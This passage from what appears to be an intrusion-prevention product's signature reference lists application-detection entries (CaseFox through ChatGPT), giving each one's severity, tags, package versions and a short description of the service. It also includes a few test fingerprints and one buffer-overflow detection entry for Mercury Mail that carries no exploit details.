Description: CaseFox Timekeeping, Billing and Case Management Software is designed to help attorneys, virtual firms, accountants and other professionals with their timekeeping, invoicing, trust accounting, time tracking, case tracking, rule based calendaring and client billing needs.
Back to top

Casengo

About this situation: Application Casengo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Casengo's cloud application for customer support empowers online retailers and other small businesses to respond to customer questions faster.
Back to top

CashBase

About this situation: Application CashBase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CashBase is a web mobile app for managing your personal finances.
Back to top

Cashboard

About this situation: Application Cashboard detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cashboard - Freelance time tracking software, online invoice software and project management. Accept online payments.
Back to top

CashStar

About this situation: Application CashStar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CashStar is a combine an on-demand B2C and B2B digital gifting and incentives platform with innovative multichannel marketing strategies.
Back to top

Caspio

About this situation: Application Caspio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Caspio provides software that allows create database applications without coding.
Back to top

Cast-Iron-Live

About this situation: Application Cast-Iron-Live detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IBM WebSphere Cast Iron Live is a multi-tenant, cloud-based platform for integrating cloud and on-premise applications and enterprise systems in a hybrid environment.
Back to top

Castlight

About this situation: Application Castlight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Castlight delivers a comprehensive suite of Enterprise Healthcare applications to reduce costs and improve quality and outcomes for enterprises and their people. Castlight enables employers to provide actionable information to their employees, introduce advanced benefit designs and manage adjacent areas of health care benefit spending.
Back to top

Casto-Travel

About this situation: Application Casto-Travel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Casto Travel is the travel management company that serves business and leisure travelers. It is provides corporate, concierge, vacation, and group travel management services.
Back to top

Catalogue-Manager

About this situation: Application Catalogue-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: marketingunity Catalogue Manager is Web shop for all types of product. It offers comprehensive functionality for all types of variable data/Print-on-Demand products, including marketing collateral, Point of Sale, Business cards and training manuals.
Back to top

CatalystOne

About this situation: Application CatalystOne detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CatalystOne provides cloud applications for Human Capital Management including Core HR, Competence, Performance, Compensation and Talent.
Back to top

Catch

About this situation: Catch usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Catch is a free app for capturing ideas and turning them into action with simple mobile collaboration.It invites others to contribute to your ideas for simple, immediate mobile collaboration in a secure, shared space.
Back to top

Catchpoint

About this situation: Application Catchpoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Catchpoint delivers world-class Web Performance Monitoring for all Internet services: Website, Mobile, App, Ads, API, DNS, CDN, Streaming, Cloud and more
Back to top

Catchup-Math

About this situation: Application Catchup-Math detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Catchup Math is an online math review, remediation, and intervention service for middle school, high school, and college students covering Pre-algebra, Algebra, and Geometry.
Back to top

Cater2.me

About this situation: Application Cater2.me detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cater2.me provides office lunch catering by working with local food trucks, restaurants, farmer's market purveyors and boutique caterers.
Back to top

Caterease

About this situation: Application Caterease detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Caterease is a desktop and cloud-based event management software that helps to manage and track multiple events. It is useful to managing catering events with features such as food.
Back to top

causeway

About this situation: Application causeway detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Causeway is the provider that powers the design, build, operation and maintenance of the built environment.
Back to top

Cavium

About this situation: Application Cavium detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cavium is a provider of highly integrated semiconductor processors that enable intelligent networking, communications, storage, video and security applications. Cavium offers a broad portfolio of integrated, software compatible processors ranging in performance from 1Gbps to 100Gbps that enable secure, intelligent functionality in Enterprise, Data-Center, Broadband
Back to top

Cayzu

About this situation: Application Cayzu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cayzu is a cloud-based helpdesk software solution designed to manage customer service for small and medium sized businesses.
Back to top

CBS-Interactive

About this situation: CBS Interactive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: CBS Interactive is an American company and is a division of the CBS Corporation. It is an online content network for information and entertainment. Its websites cover news, sports, entertainment, technology and business. Source: Wikipedia.
Back to top

CBS-Video

About this situation: CBS Video usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-629-5211
Description: CBS Video is the online video service provided by CBS Interactive, where users can access videos posted by CBS. User may watch videos posted on different categories.
Back to top

Cbs.com

About this situation: cbs.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: CBS is a major US commercial broadcasting television network, which started as a radio network, and continues to operate a radio network and a portfolio of large market television and radio stations.
Back to top

CCB

About this situation: CCB usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1764-5242
Description: CCB usage detected. CCB (China Construction Bank) is a Chinese bank corporation.
Back to top

CCSO_Fingerprint-Test-1

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Fingerprint-Test-10

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-900-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Fingerprint-Test-11

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-900-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Fingerprint-Test-2

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Fingerprint-Test-3

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Fingerprint-Test-4

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Fingerprint-Test-5

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Fingerprint-Test-6

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Fingerprint-Test-7

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Fingerprint-Test-8

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Fingerprint-Test-9

About this situation: Test fingerprint
Context: CCSO TCP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Obsolete, TCP Client Traffic
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-900-5242
Vulnerability: Fingerprint-Test
Description:
Back to top

CCSO_Mercury-Mail-Transport-System-Long-Command-BOF

About this situation: Possible buffer overflow exploit against Mercury Mail Transport System
Context: CCSO TCP Client Stream
Severity: 7
Tags: Windows, x86, Mercury Mail Transport System, CVE2005, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: CCSO-Mercury-Mail-Transport-System-Long-Command-BOF
Description:
Back to top

CD-Messenger

About this situation: Application CD-Messenger detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Corporate Digital Messenger is business instant messenger software for inter office communication featured with sticky notes, office communicator.
Back to top

CDC

About this situation: Application CDC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CDC is the nation's health promotion, prevention, and preparedness agency in public health. CDC remains public health efforts to prevent and control infectious and chronic diseases, injuries, workplace hazards, disabilities, and environmental health threats.
Back to top

CDN77

About this situation: CDN77 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-1764-5242
Description: CDN77 usage detected. CDN77 is a content delivery network.
Back to top

CDNetworks

About this situation: CDNetworks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-1764-5242
Description: CDNetworks usage detected. CDNetworks is a content delivery network.
Back to top

Cdwg

About this situation: CDWG usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: CDW is a leading provider of integrated information technology solutions. They help small, medium and large business, government, education and healthcare customers by delivering critical solutions to their increasingly complex IT needs.
Back to top

CEB

About this situation: Application CEB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CEB is a traded company that provides advisory services to businesses.
Back to top

Ceboa

About this situation: Application Ceboa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ceboa provides web-based private and secure access to your critical business information.
Back to top

Cegedim

About this situation: Application Cegedim detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cegedim is a company of technology and services. It supplies services, technological tools, specialized software, data flow management services and databases. Its offerings are targeted at healthcare professionals, healthcare industries, pharmaceutical companies, and insurance companies.
Back to top

CegidGroup

About this situation: Application CegidGroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CegidGroup is a digital transformation company, providing cloud services and enterprise software to private companies and public entities. It addresses to management needs of companies and public entities in the fields of finance, taxation and human resources, and offers industry-specific solutions to companies in the manufacturing, trade, services and retail sectors as well as to the accounting profession. Based on MoBiClo, its technological concept combining Mobility, Business Intelligence and the Cloud.
Back to top

Celebros---Hosted-Solutions

About this situation: Application Celebros---Hosted-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Celebros -is the global semantic site-search, merchandizing and navigation conversion technologies which include semantic site-search, dynamic merchandizing, navigation, cross-sell, virtual categories, livesight analytics, auto complete and multi-select navigation.
Back to top

Celoxis

About this situation: Application Celoxis detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Celoxis is a web-based project management software company.
Back to top

Celtx

About this situation: Application Celtx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Celtx is media pre-production software, designed for creating and organizing media projects like screenplays, films, videos, stageplays, audio plays, documentaries, machinima, comics, games and podcasts.
Back to top

Cengage-Learning

About this situation: Application Cengage-Learning detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cengage Learning is a publisher of print and digital information services for the academic, professional and library markets, sells textbooks, educational software, and training programs.
Back to top

Cenit

About this situation: Application Cenit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cenit provides consultancy and software for the optimization of business processes in product lifecycle management and enterprise information management.
Back to top

Centage

About this situation: Application Centage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Centage provides automated, budgeting and planning software solutions for small to medium-sized organizations.
Back to top

CenterBeam-Spam-Manager

About this situation: Application CenterBeam-Spam-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CenterBeam is an IT managed service provider
Back to top

Central-Desktop

About this situation: Application Central-Desktop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Central Desktop's SocialBridge - Social Collaboration Software, Online Project Management and Sharepoint Alternative for Businesses.
Back to top

Central-Information-Display

About this situation: Application Central-Information-Display detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Central Information Display is a cloud-based computer diagnostics software to alert if computer has problems.
Back to top

CentraStage

About this situation: Application CentraStage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CentraStage is the cloud-based device management solution. Combining the flexibility and cost-effectiveness required by small businesses with the scale and sophistication demanded by the Enterprise, CentraStage empowers IT managers with complete visibility and control over their entire IT estate from a single integrated cloud platform.
Back to top

CENTRI-Technology

About this situation: Application CENTRI-Technology detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CENTRI Technology provides data encryption and optimization solutions. Its technology helps organizations secure data by integrating into existing applications and services in the cloud, data centers or mobile devices.
Back to top

Centric-CRM

About this situation: Centric CRM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: A full featured enterprise-quality open source CRM solution
Back to top

Centrify

About this situation: Application Centrify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Centrify provide strengthens enterprise security by managing and securing user identities from cyber threats. As organizations expand IT resources and teams beyond their premises, identity is becoming the new security perimeter. With Centrify platform of integrated software and cloud-based services, Centrify uniquely secures and unifies identity for both privileged and end users across today's hybrid IT world of cloud, mobile and data center.
Back to top

CenturyLink

About this situation: Application CenturyLink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CenturyLink is a communications, hosting, cloud and IT services company.
Back to top

CenturyLink-Cloud

About this situation: Application CenturyLink-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Centurylink Cloud Object Storage archives, manages, and serves large amounts of unstructured data.
Back to top

CEPREI-Certification-Body

About this situation: Application CEPREI-Certification-Body detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CEPREI Laboratory provides services on product testing, analysis, evaluation, certification, calibration, information services, technical training, special equipment and software development for components or equipments as well as large hardware or software complex system.
Back to top

Ceridian

About this situation: Application Ceridian detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ceridian delivers cloud-based Dayforce HCM, human resources, payroll, employee benefits and wellness services to help you transform human capital management in your business.
Back to top

Ceridian-Ereports

About this situation: Application Ceridian-Ereports detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: eReportsCeridian is business solution for human resources and employees effectiveness
Back to top

Cerner

About this situation: Application Cerner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cerner is the supplier of health care information technology solutions that optimize clinical and financial outcomes.
Back to top

Ceros

About this situation: Application Ceros detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ceros is a cloud-based interactive content creation platform.
Back to top

CertainSafe

About this situation: Application CertainSafe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CertainSafe is the insanely secure file sharing company.
Back to top

Certes-Networks

About this situation: Application Certes-Networks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Certes CryptoFlows provide user-aware, application-aware software-defined security of any enterprise application.
Back to top

Certificate-Revocation-List-Service

About this situation: Certificate Revolcation List (CRL) service detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services
First detected in: sgpkg-ips-1116-5242
Last changed: sgpkg-ips-1802-5242
Description: Certificate Revocation Lists (CRLs) are used to check the validity of individual X.509 certificates. This Application detects the retrieval of CRL files over HTTP.
Back to top

Certify

About this situation: Certify usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Certify is the leading cloud-based travel and expense report management solution for companies of all sizes.
Back to top

CEX.IO

About this situation: Application CEX.IO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CEX.IO is a website embodying bitcoin crypto exchange and cloud mining provider.
Back to top

Ceyoniq

About this situation: Application Ceyoniq detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Document management, process workflow and digital archiving with the ECM software scale of Ceyoniq Technology GmbH
Back to top

Cezanne-HR

About this situation: Application Cezanne-HR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cezanne HR is Cloud HR software solutions.
Back to top

CFA-Institute

About this situation: Application CFA-Institute detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CFA Institute provides continuing education conferences, seminars, webcasts and publications to allow members to stay current on developments in the investment industry.
Back to top

CFP-Board

About this situation: Application CFP-Board detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CFP Board
Back to top

Cgi-IRC

About this situation: Cgi-IRC usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-466-5211
Last changed: sgpkg-ips-1672-5242
Description: Cgi-IRC is a Perl/CGI program that allows users to access IRC from a web browser and chat with other people.
Back to top

CGR

About this situation: Application CGR detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Corporate Governance Risk
Back to top

Cgsinc

About this situation: Application Cgsinc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Computer Generated Solutions
Back to top

ChamberMaster

About this situation: Application ChamberMaster detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ChamberMaster help your member-based organization track membership information, generate reports and metrics, schedule and send communication, create group/committees, send batch invoices.
Back to top

Chango-publisher

About this situation: Application Chango-publisher detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Chango is a programmatic advertising platform that connects marketers with their exact target audience in real time across display, social, mobile and video.
Back to top

Channel4

About this situation: Channel 4 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-630-5211
Description: Channel 4 (www.channel4.com) is the online version of the British television broadcaster. The web site providesstreaming media for TV shows, movies, and music.
Back to top

ChannelAdvisor

About this situation: Application ChannelAdvisor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ChannelAdvisor is provider of cloud-based e-commerce solutions that enable retailers and manufacturers to integrate, manage and optimize their merchandise sales across hundreds of online channels.
Back to top

Channelchooser

About this situation: ChannelChooser usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based Internet Protocol television (IPTV) video-streaming service where users can watch videos and live television using a web browser
Back to top

ChannelInsight

About this situation: Application ChannelInsight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InfoNow's SaaS-based ChannelInsight automates the collection, cleansing, matching, validation, standardization, and enriching POS and inventory channel data from any source or format.
Back to top

ChannelReply

About this situation: Application ChannelReply detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ChannelReply is the platform that allow to answer eBay and Amazon messages in Zendesk You. ChannelReply enables customer service team to harness of Zendesk Macros and Business Rules.
Back to top

Channeltivity

About this situation: Application Channeltivity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Channeltivity is a channel management solution that helps to run a partner program. Its partner relationship management software and partner portal helps to manage, enable and engage channel partners.
Back to top

Chaos-Video

About this situation: Chaos Video usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-630-5211
Description: Chaos Video is a fighting videos online service. Its landing page is http://www.chaosvideo.com.
Back to top

ChargeDesk

About this situation: Application ChargeDesk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ChargeDesk integrated with payment gateways in order to provide support agents with the relevant billing information for the customers. ChargeDesk also provides turnkey billing support pages, invoices and email receipts.
Back to top

Chargify

About this situation: Chargify usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Chargify is an online service and platform that automates billing for recurring revenue businesses.
Back to top

Chartbeat

About this situation: Chartbeat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-625-5211
Description: Chartbeat is a web advertising and statistic collection service.
Back to top

Chartio

About this situation: Chartio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Chartio lets user to explore, transform, display, and control data.Chartio builds charts directly from data without a warehouse, so there is no lag time.
Back to top

Chase

About this situation: Chase usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: Chase usage detected. JP Morgan Chase is a US-based bank.
Back to top

Chat-Avenue

About this situation: Chat Avenue usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Chat-Way

About this situation: chat way usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Chat-Web

About this situation: chat web usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

Chatango

About this situation: Chatango usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: Chatango is a free service that enables embedding live chats to webpages. Chatango also has a mobile chat app.
Back to top

Chatbox

About this situation: Application Chatbox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Chatbox - is a solution for enterprise collaboration with solutions for Work, Support, and Websites.
Back to top

Chatforfree

About this situation: chatforfree usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

ChatGPT

About this situation: ChatGPT usage detected
Context: Application Context
